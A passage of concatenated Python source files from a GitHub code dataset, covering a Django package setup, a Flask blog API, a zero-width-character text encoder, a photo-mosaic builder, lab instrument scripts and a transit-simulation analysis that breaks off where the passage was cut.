   \n    ","repo_name":"RobusGauli/xlsx-extractor","sub_path":"excel_extract.py","file_name":"excel_extract.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"37511126295","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n\nwith open('README.rst') as readme_file:\n    readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n    history = history_file.read()\n\nrequirements = [\n    'Django'\n]\n\nsetup(\n    name='django_reciprocity',\n    version='0.0.1',\n    description=\"Interactive web apps with Django\",\n    long_description=readme + '\\n\\n' + history,\n    author=\"Michał Pasternak\",\n    author_email='michal.dtz@gmail.com',\n    url='https://github.com/mpasternak/django-reciprocity',\n    packages=[\n        'reciprocity',\n    ],\n    package_dir={'reciprocity': 'reciprocity'},\n    include_package_data=True,\n    install_requires=requirements,\n    license=\"MIT license\",\n    zip_safe=False,\n    classifiers=[\n        'Development Status :: 2 - Pre-Alpha',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: MIT License',\n        'Natural Language :: English',\n        'Programming Language :: Python :: 3.7',\n    ],\n)\n","repo_name":"mpasternak/django-reciprocity","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"30113478282","text":"\"\"\"Incomplete file with only the predicates we use in our mappings\"\"\"\nimport dateutil.parser\nfrom .querier import querier, var, BLANK\nfrom 
..utils import parsetime\n\n\n@querier.prov(\"entity\", [\"id\", \"text\"])\ndef entity(querier, eid, attrs={}, id_=None):\n return [\n eid,\n querier.text(\"entity\", [eid], attrs, id_)\n ]\n\n\n@querier.prov(\"activity\", [\"id\", \"start\", \"end\", \"text\"])\ndef activity(dot, aid, start_time=None, end_time=None, attrs=None, id_=None):\n start = parsetime(start_time)\n end = parsetime(end_time)\n return [\n aid, start, end,\n querier.text(\"activity\", [aid, start_time, end_time], attrs, id_)\n ]\n\n\n@querier.prov(\"used\", [\"id\", \"activity\", \"entity\", \"time\", \"text\"])\ndef used(dot, aid, eid=None, time=None, attrs=None, id_=None):\n ti = parsetime(time)\n return [\n id_, aid, eid, ti,\n querier.text(\"used\", [aid, eid, time], attrs, id_)\n ]\n\n\n@querier.prov(\"wasDerivedFrom\", [\"generated\", \"used\", \"activity\", \"generation\", \"use\", \"attrs\", \"text\"])\ndef wasDerivedFrom(dot, egenerated=None, eused=None, aid=None, gid=None, uid=None, attrs=None, id_=None):\n return [\n egenerated, eused, aid, gid, uid,\n attrs or {}, querier.text(\n \"wasDerivedFrom\",\n [egenerated, eused, aid, gid, uid], attrs, id_\n )\n ]\n\n\n@querier.prov(\"wasGeneratedBy\", [\"id\", \"entity\", \"activity\", \"time\", \"text\"])\ndef wasGeneratedBy(dot, eid, aid=None, time=None, attrs=None, id_=None):\n ti = parsetime(time)\n return [\n id_, eid, aid, ti,\n querier.text(\"wasGeneratedBy\", [eid, aid, time], attrs, id_)\n ]\n\n\n@querier.prov(\"hadMember\", [\"collection\", \"entity\", \"text\"])\ndef hadMember(dot, ecollection=None, eid=None, attrs=None, id_=None):\n return [\n ecollection, eid,\n querier.text(\"hadMember\", [ecollection, eid], attrs, id_)\n ]\n\n\n@querier.prov(\"specializationOf\", [\"specific\", \"general\", \"text\"])\ndef specializationOf(dot, specific=None, general=None, attrs=None, id_=None):\n return [\n specific, general,\n querier.text(\"specializationOf\", [specific, general], attrs, id_)\n ]\n","repo_name":"JoaoFelipe/extensible_provn","sub_path":"extensible_provn/query/provn.py","file_name":"provn.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9546273529","text":"#!/usr/bin/env python\n\nimport serial\nimport sys\nfrom DG1022 import *\nimport usbtmc\n\nser = serial.Serial('/dev/ttyUSB0', baudrate=19200, bytesize=7,parity='O', stopbits=1, timeout=3)\n\ndef ut61e_get_mv(s):\n s.reset_input_buffer()\n line = s.readline()\n line = s.readline()\n #print(line)\n mv = float(line[1:6])/100\n return mv\n\ndev_DG = usbtmc.Instrument(0x1ab1, 0x0642)\ndev_DG.timeout = 0.1\ntry:\n print(dev_DG.ask(\"*IDN?\"))\nexcept:\n dev_DG.close()\n dev_DG = usbtmc.Instrument(0x1ab1, 0x0642)\n dev_DG.timeout = 0.1\n print(dev_DG.ask(\"*IDN?\"))\n\nr = RigolDG(dev_DG)\n\nr.SetImpedance(1, 50)\nr.SetAmplitude(1, -30)\nr.SetFrequency(1, 25000000)\nr.SetEnabled(1, True)\n \nfor dbm in range(-30, 17):\n r.SetAmplitude(1, dbm)\n sleep(2)\n mv = ut61e_get_mv(ser)\n print(\"%f;%f\"%(dbm, mv))\n","repo_name":"jankae/SpectrumAnalyzer","sub_path":"Experiments/03_mixer_gain/rf_detector_baseline.py","file_name":"rf_detector_baseline.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"61"} +{"seq_id":"24428319234","text":"from bottle import route, request, run, Bottle, abort\nfrom dateutil.rrule import *\nfrom dateutil.parser import parse\n\nicalws_app = Bottle()\n\n@icalws_app.route('/nextdates')\ndef 
nextdates():\n    if \"dtstart\" not in request.query:\n        abort(400, \"Missing dtstart\")\n    if \"rrule\" not in request.query:\n        abort(400, \"Missing rrule\")\n    \n    rdates = list(rrulestr(request.query.rrule, dtstart=parse(request.query.dtstart)))\n    res = {\n        \"dates\":[]\n    }\n    for date in rdates:\n        res[\"dates\"].append(date.strftime('%Y%m%dT%H%M%SZ'))\n    \n    return res\n\nif __name__ == \"__main__\":\n    run(app=icalws_app, host='localhost', port=8080, debug=True, reloader=True)\n","repo_name":"coderbyheart/icalws","sub_path":"icalws.py","file_name":"icalws.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"32981004827","text":"# Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.\n#\n# Example:\n#\n# Input: 1->2->4, 1->3->4\n# Output: 1->1->2->3->4->4\n\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\n\nclass Solution:\n    def mergeTwoLists(self, l1, l2):\n        \"\"\"\n        :type l1: ListNode\n        :type l2: ListNode\n        :rtype: ListNode\n        \"\"\"\n        if l1 is None and l2 is None:\n            return None\n        if l1 is None:\n            return l2\n        if l2 is None:\n            return l1\n\n        result = ListNode(0)  # dummy head; ListNode() crashed because __init__ requires x\n        point = result\n        while l1 is not None and l2 is not None:\n            if l1.val <= l2.val:\n                point.next = l1\n                l1 = l1.next\n            else:\n                point.next = l2\n                l2 = l2.next\n            point = point.next  # advance the tail so nodes are spliced, not overwritten\n        point.next = l1 if l1 is not None else l2\n        return result.next\n\n\n    # best solution\n    # res = dummy = ListNode(0)\n\n    # while l1 and l2:\n    #     if l1.val < l2.val:\n    #         res.next = l1\n    #         l1 = l1.next\n    #     else:\n    #         res.next = l2\n    #         l2 = l2.next\n    #     res = res.next\n\n    # res.next = l1 or l2\n    # return dummy.next\n","repo_name":"yshshadow/Leetcode","sub_path":"1-50/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"12884135878","text":"#!/usr/bin/env python\n\nimport sys\nimport os\n\nassert len(sys.argv) >= 2\n\ncell_line_to_rm = sys.argv[1]\n\ncell_lines = [\"MDA-231\",\n              \"MDA-157\",\n              \"MCF7\",\n              \"KPL4\",\n              \"SKBR3\",\n              \"T47D\",\n              \"HCC1954\",\n              \"HCC1569\"]\n\nif cell_line_to_rm not in cell_lines:\n    raise ValueError(\"unknown cell-line, options are :{}\".format(cell_lines))\n\ncell_lines.remove(cell_line_to_rm)\n\nEXISTING_DIR = \"/exports/igmm/datastore/Drug-Discovery/scott/2018-04-24_nncell_data_300_{}/\"\n\nNEW_DIR_NAME = \"/exports/eddie/scratch/s1027820/chopped_array/data_excluding_{}/\"\n\nfor cell_line in cell_lines:\n    cmd = \"rsync -a \" + EXISTING_DIR.format(cell_line) + \" \" + NEW_DIR_NAME.format(cell_line_to_rm)\n    sys.stdout.write(cmd + \"\\n\")\n","repo_name":"CarragherLab/2018-08_transfer_ML_between_cell_lines","sub_path":"CNN/create_rsync_commands_leave_one_out.py","file_name":"create_rsync_commands_leave_one_out.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"26541142137","text":"import pytorch_lightning as pl\nimport torch\nimport torchmetrics\nfrom torchvision.models import resnet34\n\n\nclass ModifiedResNet(torch.nn.Module):\n    def __init__(self, lr):\n        super().__init__()\n        self.resnet = resnet34(pretrained=True)\n        num_last_features = self.resnet.fc.out_features\n        self.regressor = 
torch.nn.Linear(num_last_features, 2)\n self.lr = lr\n\n def forward(self, image):\n outputs = self.resnet(image)\n logits = self.regressor(outputs)\n return torch.nn.functional.softmax(logits, 1)\n\n\nclass MaskModel(pl.LightningModule):\n def __init__(self, lr):\n super().__init__()\n self.resnet = ModifiedResNet(lr)\n self.save_hyperparameters()\n\n def training_step(self, batch, batch_idx):\n output = self.resnet(batch[0])\n # predicted = torch.argmax(torch.Tensor(output), dim=1)\n # predicted = predicted.to(torch.int64)\n cross_entropy = torch.nn.CrossEntropyLoss()\n loss = cross_entropy(output, batch[1])\n self.log(\"train_loss\", loss)\n predicted = torch.argmax(output, dim=1)\n # acc = torchmetrics.Accuracy().to(device=\"cuda\")\n # value = acc(predicted, batch[1])\n # self.log(\"train_accuracy\", value)\n return loss\n\n def validation_step(self, batch, batch_idx):\n output = self.resnet(batch[0])\n # predicted = torch.argmax(torch.Tensor(output), dim=1)\n # predicted = predicted.to(torch.int64)\n cross_entropy = torch.nn.CrossEntropyLoss()\n loss = cross_entropy(output, batch[1])\n self.log(\"val_loss\", loss)\n predicted = torch.argmax(output, dim=1)\n # acc = torchmetrics.Accuracy().to(device=\"cuda\")\n # value = acc(predicted, batch[1])\n # self.log(\"val_accuracy\", value)\n\n def test_step(self, batch, batch_idx):\n output = self.resnet(batch[0])\n # predicted = torch.argmax(torch.Tensor(output), dim=1)\n # predicted = predicted.to(torch.int64)\n cross_entropy = torch.nn.CrossEntropyLoss()\n loss = cross_entropy(output, batch[1])\n self.log(\"test_loss\", loss)\n predicted = torch.argmax(output, dim=1)\n acc = torchmetrics.Accuracy().to(device=\"cuda\")\n value = acc(predicted, batch[1])\n self.log(\"test_accuracy\", value)\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.parameters(), lr=self.hparams.lr)\n","repo_name":"Issei0804-ie/waiwai","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21301960952","text":"from flask import jsonify\nfrom flask_restful import reqparse, abort, Resource\nfrom data import db_session\nfrom data.posts import Post\nfrom data.users import User\nimport requests as rq\nimport json\n\n\ndb_session.global_init(\"db/blogs.sqlite\")\n\n\ndef get_user(token):\n session = db_session.create_session()\n return session.query(User).filter(User.api_token == token).first()\n\n\ndef abort_if_unauthorized(token):\n if not get_user(token):\n abort(401)\n\n\ndef abort_if_cant_read(post_id, token):\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n user_id = get_user(token).id\n if post.is_private:\n if post.author != user_id and post.reply_to.author != user_id:\n abort(403, message=f\"Can't read post {post_id}\")\n\n\ndef abort_if_not_owner(post_id, token):\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n user_id = get_user(token).id\n if post.author != user_id:\n abort(403, message=f\"Not owner of post {post_id}\")\n\n\ndef abort_if_post_not_found(post_id):\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n if not post:\n abort(404, message=f\"Post {post_id} not found\")\n\n\nclass PostResource(Resource):\n def get(self, post_id):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n args = parser.parse_args()\n token = args['token']\n 
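# Editor note: every handler below resolves the caller from the api_token first, aborting with 401 (bad token), 404 (missing post), or 403 (no read access) before touching post data.\n        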
abort_if_unauthorized(token)\n abort_if_post_not_found(post_id)\n abort_if_cant_read(post_id, token)\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n resp = post.to_dict(only=('id', 'content', 'user.id', 'user.username', 'is_private'))\n resp['tags'] = post.tags.split()\n resp['likes'] = len(post.liked)\n return jsonify(resp)\n\n def post(self, post_id):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n parser.add_argument('action', required=True, type=str)\n args = parser.parse_args()\n token = args['token']\n abort_if_unauthorized(token)\n abort_if_post_not_found(post_id)\n abort_if_cant_read(post_id, token)\n user = get_user(token)\n if args['action'] == 'like':\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n if not post:\n abort(404)\n if user.id in post.liked:\n post.liked = post.liked ^ {user.id}\n else:\n post.liked = post.liked | {user.id}\n session.commit()\n return jsonify({'success': 'OK'})\n else:\n return jsonify({'BAD_PARAMETER': 'action'})\n\n def delete(self, post_id):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n args = parser.parse_args()\n abort_if_unauthorized(args['token'])\n abort_if_post_not_found(post_id)\n abort_if_not_owner(post_id, args['token'])\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n post.content = '[DELETED]'\n post.tags = ''\n post.liked = set()\n post.attachments = set()\n session.commit()\n return jsonify({'success': 'OK'})\n\n\nclass PostListResource(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n parser.add_argument('limit', type=int)\n parser.add_argument('offset', type=int)\n parser.add_argument('author', type=int)\n args = parser.parse_args()\n abort_if_unauthorized(args['token'])\n user = get_user(args['token'])\n session = db_session.create_session()\n limit = int(args['limit']) if args['limit'] else 20\n out = []\n if args['offset']:\n posts = session.query(Post).order_by(Post.id.desc()).filter(Post.id < int(args['offset']))\n else:\n posts = session.query(Post).order_by(Post.id.desc())\n for post in posts:\n if (not post.is_private or post.user == user or post.reply_to.user == user) and (not args['author'] or post.author == int(args['author'])):\n resp = post.to_dict(only=('id', 'content', 'user.id', 'user.username', 'is_private'))\n resp['tags'] = post.tags.split()\n resp['likes'] = len(post.liked)\n out += [resp]\n if len(out) == limit:\n break\n return jsonify(out)\n\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n parser.add_argument('content', required=True, type=str)\n parser.add_argument('tags', required=False, type=str)\n parser.add_argument('is_private', required=False, type=bool)\n parser.add_argument('reply_to', required=False, type=int)\n args = parser.parse_args()\n abort_if_unauthorized(args['token'])\n session = db_session.create_session()\n post = Post(content=args['content'], author=get_user(args['token']).id)\n if args['tags'] is not None:\n post.tags = ' ' + args['tags']\n if args['is_private'] is not None:\n post.is_private = args['is_private']\n if args['reply_to'] is not None:\n abort_if_post_not_found(args['reply_to'])\n abort_if_cant_read(args['reply_to'], args['token'])\n reply_post = session.query(Post).get(args['reply_to'])\n if reply_post:\n post.reply_to_id = args['reply_to']\n if 
reply_post.is_private:\n                    post.is_private = True\n        else:\n            lpost = session.query(Post).order_by(Post.id.desc()).first()\n            if lpost:\n                post.reply_to_id = lpost.id + 1\n            else:\n                post.reply_to_id = 1\n        session.add(post)\n        session.commit()\n        return jsonify({'post_id': post.id})\n","repo_name":"ArtyZn/mutblr","sub_path":"data/posts_resources.py","file_name":"posts_resources.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"8914580830","text":"_ZERO_WIDTH_NON_JOINER = '‌'\n_ZERO_WIDTH_JOINER = '‍'\n_ZERO_WIDTH_SPACE = '​'\n_ZERO_WIDTH_NO_BREAK_SPACE = '﻿'\n_LEFT_TO_RIGHT_MARK = '‎'\n_RIGHT_TO_LEFT_MARK = '‏'\n\nzeroWidthDict = {\n    _LEFT_TO_RIGHT_MARK: _LEFT_TO_RIGHT_MARK,\n    _RIGHT_TO_LEFT_MARK: _RIGHT_TO_LEFT_MARK,\n    _ZERO_WIDTH_NON_JOINER: _ZERO_WIDTH_NON_JOINER,\n    _ZERO_WIDTH_JOINER: _ZERO_WIDTH_JOINER,\n    _ZERO_WIDTH_NO_BREAK_SPACE: _ZERO_WIDTH_NO_BREAK_SPACE,\n    _ZERO_WIDTH_SPACE: _ZERO_WIDTH_SPACE\n}\n\n_Quinary2ZeroMap: list = list(zeroWidthDict.values())\n_Zero2QuinaryMap: dict = {index: values for values, index in enumerate(_Quinary2ZeroMap)}\n\n\ndef _is_visible(char: str) -> bool:\n    return char not in _Zero2QuinaryMap\n\n\ndef _find_first_visible(text: str):\n    for index, char in enumerate(text):\n        if _is_visible(char):\n            return index\n    return -1\n\n\ndef _to_any_base(number: int, radix: int) -> str:\n    digits = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+-={}[]|\\\\:\\\";\\'<>?,./`~\"\n    max_radix = len(digits)\n    if radix < 2 or radix > max_radix:  # the old chained comparison 2 > radix > max_radix could never be true\n        raise ValueError(f\"radix must be between 2 and {max_radix}.\")\n\n    remstack = []\n\n    while number > 0:\n        rem = number % radix\n        remstack.append(rem)\n        number = number // radix\n\n    result = \"\"\n    while len(remstack):\n        result += digits[remstack.pop()]\n\n    return result\n\n\ndef t2z(t: str) -> str:\n    z = ''\n    char: str\n    for char in list(t):\n        base10 = ord(char)\n        base5 = _to_any_base(int(base10), 5)\n        zero = ''.join([_Quinary2ZeroMap[int(each)] for each in list(base5)])\n        z = z + zero + _ZERO_WIDTH_SPACE\n    return z[:-1]\n\n\ndef z2t(z: str) -> str:\n    t = ''\n    if len(z) == 0:\n        return t\n\n    char: str\n    for char in z.split(_ZERO_WIDTH_SPACE):\n        base5 = ''.join([str(_Zero2QuinaryMap[each]) for each in list(char)])\n        t += chr(int(base5, 5))\n    return t\n\n\ndef encode(visible: str, hidden: str) -> str:\n    hid2z = t2z(hidden)\n    if len(visible) == 0:\n        return hid2z\n\n    e = f\"{visible[:1]}{hid2z}{visible[1:]}\"\n    return e\n\n\ndef extract(text: str) -> dict[str, str]:\n    first_visible = _find_first_visible(text)\n    second_visible = _find_first_visible(text[first_visible + 1:])\n    visible = ''\n    hidden = ''\n\n    for char in text[:second_visible + 1]:\n        if _is_visible(char):\n            visible += char\n        else:\n            hidden += char\n\n    for char in text[second_visible - 1:]:\n        if _is_visible(char):\n            visible += char\n\n    return {\"visible\": visible,\n            \"hidden\": hidden}\n\n\ndef decode(visible: str) -> str:\n    return z2t(extract(visible)['hidden'])\n\n\ndef split(text: str) -> str:\n    second_visible = _find_first_visible(text[1:])\n    result = text[:second_visible + 1]\n    split_list = text[second_visible + 1:]\n    for char in split_list:\n        result += f\"{char}{_ZERO_WIDTH_SPACE}\"\n    return result\n","repo_name":"Ancaea/zero-width-lib-python","sub_path":"src/zero_width_lib.py","file_name":"zero_width_lib.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
{"seq_id":"3345874703","text":"from PIL import ImageFile, Image\nfrom 
multiprocessing import Process\nfrom multiprocessing import cpu_count\nfrom multiprocessing import Queue\nimport sys\nimport os\nimport cv2\n\n#########################################################################################################\n# Program Parameters\n# These can be changed here to improve on processing speed\n# Dimensions, being the height and width of the images to be used as tiles in mosaic\nTILE_DIM = 50\n\n# Null value\nNULL = None\t\n\n# The zoom constant that controls the scale of the mosaic compared to the target\nZOOM = 8\t\t\n\n# Used to scale the tile down for easier processing, cannot be one\nRES = 5\t\n\n# Runnning processes\nPROCESSES = max(cpu_count() - 1, 1)\n\n# File to be output in working directory\nOUT_FILE = 'mosaic_image.jpeg'\n\n# Use the RES constant to scale the dimensions while keeping it from being scaled by one\nNEW_TILE_DIM = TILE_DIM / max(min(RES, TILE_DIM), 1)\n\n\n#########################################################################################################\n\nclass Target:\n # Constructor \n def __init__(self, target_dir):\n self.target_dir = target_dir\n\n # Converts the target image to RGB\n def process_target(self):\n print('Processing target image...')\n image = Image.open(self.target_dir)\n width = image.size[0] * ZOOM\n height = image.size[1] * ZOOM\n dim = (width, height)\n \n # Resize the image according to the ZOOM constant\n large_image = image.resize(dim, Image.ANTIALIAS)\n\n small_dim = (int(width / NEW_TILE_DIM), int(height / NEW_TILE_DIM))\n small_image = large_image.resize(small_dim, Image.ANTIALIAS)\n\n # Convert it to a tuple that containts the RGB colours\n image_data = (large_image.convert('RGB'), small_image.convert('RGB'))\n\n print('Processing of target image complete.')\n\n return image_data\n\n# Utilises multithreading inorder to speed up the configuration of the mosaic\ndef place_tiles(queue, result, crop_data):\n make_mosaic = MosaicMaker(crop_data)\n while_var = True\n while while_var:\n try:\n img_data, img_location = queue.get(True)\n if img_data == NULL:\n break\n index = make_mosaic.fit_cropped_img(img_data)\n result.put((img_location, index))\n except KeyboardInterrupt:\n pass\n\n # let the result handler know that this worker has finished everything\n result.put((NULL, NULL))\n \n\n\n#########################################################################################################\nclass Tiles:\n # Constructor \n def __init__(self, image_dir):\n self.image_dir = image_dir\n\n # Takes the batch of images from the folder, crops them converts them to RBG\n def __process_imgs(self, img_path):\n try:\n image = Image.open(img_path) \n \n #Images are truncated due to the size of some, being too large to process\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n \n # Input images must be square, so take the smaller of the two and crop it to match\n width = image.size[0]\n height = image.size[1]\n min_dim = min(width, height) \n \n # Create a larger and smaller image\n large_dim = (TILE_DIM, TILE_DIM)\n small_dim = (int(TILE_DIM/NEW_TILE_DIM), int(TILE_DIM/NEW_TILE_DIM))\n \n # Resize to get the images\n large_image = image.resize(large_dim, Image.ANTIALIAS)\n small_image = image.resize(small_dim, Image.ANTIALIAS)\n \n return (large_image.convert('RGB'), small_image.convert('RGB'))\n except:\n return (NULL, NULL)\n # An empty tuple is returned if the image cannot be used\n\n # Collect the images to be used in the mosaic from the folders\n def get_tiles(self):\n large_images = []\n small_images = []\n\n 
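# Editor note: os.walk below recurses through every subfolder; files that fail to open come back from __process_imgs as (None, None) and are skipped by the truthiness check.\n        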
print('Folder {} currently being read...'.format(self.image_dir))\n\n # Extensively search all the files in the image directory\n # And update user on progress\n for root, subFolders, files in os.walk(self.image_dir):\n for img in files:\n # Prints out the name of each file read\n print('Reading {:40.40}'.format(img), flush=True, end='\\r')\n file_path = os.path.join(root, img)\n large_image, small_image = self.__process_imgs(file_path)\n if large_image:\n large_images.append(large_image)\n small_images.append(small_image)\n\n\n print('A total of {} image files processed.'.format(len(large_images)))\n\n return (large_images, small_images)\n \n#########################################################################################################\n\n# Basically the starting function for the entire program\ndef mosaic(image_path, tiles_path):\n image_data = Target(image_path).process_target()\n input_data = Tiles(tiles_path).get_tiles()\n create(image_data, input_data)\n\n\n#########################################################################################################\nclass MosaicMaker:\n # Constructor\n def __init__(self, crop_data):\n self.crop_data = crop_data\n\n # Compares images and calculates the difference between the RBG values of the tile \n # and the specific region of the target image\n def __compare_imgs(self, img1, img2, stop):\n img_diff = 0\n for x in range(len(img1)):\n img_diff += ((img1[x][0] - img2[x][0])**2 + (img1[x][1] - img2[x][1])**2 + (img1[x][2] - img2[x][2])**2)\n if img_diff > stop:\n # If the difference is bigger than the max value, then there is no need to continue\n return img_diff\n return img_diff\n\n # Determine the best location for the tile in the mosaic image by determining the best possible index\n def fit_cropped_img(self, img_data):\n best_index = 0\n minimum = sys.maxsize\n index = 0\n \n for tile_data in self.crop_data:\n diff = self.__compare_imgs(img_data, tile_data, minimum)\n if diff < minimum:\n minimum = diff\n best_index = index\n index = index + 1\n return best_index\n\n\n#########################################################################################################\n\n# A simple class that tracks the progress of the mosaic in percent completed\nclass Progress:\n def __init__(self, total):\n self.total = total\n self.updated = 0\n\n def update(self):\n self.updated += 1\n print(\"Progress: {:04.1f}%\".format(100 * self.updated / self.total), flush=True, end='\\r')\n \n\n#########################################################################################################\n\nclass MosaicImage:\n # Constructor\n def __init__(self, original):\n self.image = Image.new(original.mode, original.size)\n self.x_count = int(original.size[0] / TILE_DIM)\n self.y_count = int(original.size[1] / TILE_DIM)\n self.total_tiles = self.x_count * self.y_count\n\n # Use paste from the python image library to put the tiles together to make the mosaic\n def add_img(self, tile_data, location):\n image = Image.new('RGB', (TILE_DIM, TILE_DIM))\n image.putdata(tile_data)\n self.image.paste(image, location)\n\n # Saves the image in the directory given \n def save(self, final_path):\n self.image.save(final_path)\n\n#########################################################################################################\n# Build the mosaic using processes \ndef build_mosaic(result, total_large, large_original):\n mosaic = MosaicImage(large_original)\n \n running_processes = PROCESSES\n while True:\n try:\n img_location, best_index = 
result.get()\n \n if img_location == NULL:\n running_processes -= 1\n if not running_processes:\n break\n else:\n tile_data = total_large[best_index]\n mosaic.add_img(tile_data, img_location)\n\n except KeyboardInterrupt:\n pass\n\n \n mosaic.save(OUT_FILE)\n im = Image.open(OUT_FILE)\n im.show()\n print('\\nFinished, output is in\\n', OUT_FILE)\n\n#########################################################################################################\n\n# Primary function that handles the target image and the folder of given images\ndef create(original_image, all_tiles):\n print('Creating your mosaic...')\n large_original, small_orginal = original_image\n large_tiles, small_tiles = all_tiles\n\n mosaic = MosaicImage(large_original)\n\n total_large = [list(tiles.getdata()) for tiles in large_tiles]\n total_small = [list(tiles.getdata()) for tiles in small_tiles]\n\n queue = Queue(PROCESSES)\t\n result = Queue()\n\n try:\n # This begins the process that builds the mosaic\n Process(target = build_mosaic, args = (result, total_large, large_original)).start()\n\n # This starts the processes that put the tiles together\n for x in range(PROCESSES):\n Process(target = place_tiles, args=(queue, result, total_small)).start()\n\n # Keep track of the progress of the mosaic\n completed = Progress(mosaic.x_count * mosaic.y_count)\n for x in range(mosaic.x_count):\n for y in range(mosaic.y_count):\n large_set = (x * TILE_DIM, y * TILE_DIM, (x + 1) * TILE_DIM, (y + 1) * TILE_DIM)\n small_set = (x * TILE_DIM/NEW_TILE_DIM, y * TILE_DIM/NEW_TILE_DIM, (x + 1) * TILE_DIM/NEW_TILE_DIM, (y + 1) * TILE_DIM/NEW_TILE_DIM)\n queue.put((list(small_orginal.crop(small_set).getdata()), large_set))\n \n completed.update()\n\n finally:\n # End the processes by sending them null values\n for n in range(PROCESSES):\n queue.put((NULL, NULL))\n\n\n#########################################################################################################\n\n# The actual starting point for the program\n# Only runs once\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print('Usage: {} \\r'.format(sys.argv[0]))\n sys.exit()\n \n print(\"Variables can be editied by changing the values within the program in a text editor\\n\")\n print(\"Visit the top of the program file for the variables\\n\")\n condition = str(input(\"Resize image for faster processing? 
(yes or no)\\n\"))\n if (condition == \"yes\"):\n original = Image.open(sys.argv[1])\n new = original.copy()\n original = original.save(\"original.jpg\")\n \n print(\"Image will be resized\\n\")\n print(\"Original image will be renamed original.jpg\\n\")\n scale = float(input(\"Enter the desired scale, decimals recommended\\n\"))\n \n height = new.size[1]\n width = new.size[0]\n \n height = int(height - (height * scale)) \n width = int(width - (width * scale))\n \n dim = (width, height)\n new = new.resize(dim)\n \n new = new.save(sys.argv[1])\n \n mosaic(sys.argv[1], sys.argv[2]) \n \n\n\n","repo_name":"DaronWuzHere/Creations","sub_path":"run-mosaic/mosaic.py","file_name":"mosaic.py","file_ext":"py","file_size_in_byte":11301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70030969796","text":"import pandas as pd\npd.options.mode.chained_assignment = None\nimport numpy as np\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--date\", type=str, default=\"2021-08-s20\", help=\"date\")\n# parser.add_argument(\"--sim\", type=str, default=\"transit-sim-date\", help=\"simulation folder\")\n# parser.add_argument(\"--BTE_data\", type=str, default=\"BTE/edge_speed_by_sim.pkl\", help=\"BTE data\")\nargs = parser.parse_args()\n\n## bus stop output containing delay and person load information\nstopO = pd.read_csv(\"../transit-sim-date/busstop_output.csv\",sep=';')\nstopO=stopO[[\"stopinfo_id\",\"stopinfo_busStop\",\"stopinfo_started\",\"stopinfo_arrivalDelay\",\n \"stopinfo_ended\",\"stopinfo_delay\",\"stopinfo_initialPersons\",\n \"stopinfo_loadedPersons\",\"stopinfo_unloadedPersons\",\n \"stopinfo_lane\",\"stopinfo_pos\",\"stopinfo_parking\"]]\nstopO=stopO.sort_values([\"stopinfo_id\",\"stopinfo_started\"])\n\n## trajectory for all vehicles during the simulation time interval\nmotion = pd.read_csv(\"../transit-sim-date/trajectory_output.csvmotionState.csv\",sep=';',low_memory=False)\nvehtype = pd.read_csv(\"../transit-sim-date/trajectory_output.csvactorConfig.csv\",sep=';')\nvehref = pd.read_csv(\"../transit-sim-date/trajectory_output.csvvehicle.csv\",sep=';')\n\n# extract the output values for buses\nvehref['vehicle_ref'] = vehref['vehicle_ref'].astype('str')\nbus = vehref\n# bus=vehref[vehref['vehicle_ref'].apply(lambda x: len(x)>20)]\nbusref=bus[['vehicle_ref','vehicle_id','vehicle_actorConfig']]\nbusref.rename(columns={'vehicle_actorConfig' : 'actorConfig_id'},inplace = True)\n# join busref and vehtype by the same column 'actorConfig_id'\nbusinfo=pd.merge(busref, vehtype, on='actorConfig_id')\n\ntraj=motion.loc[motion.motionState_vehicle.isin(businfo.vehicle_id), 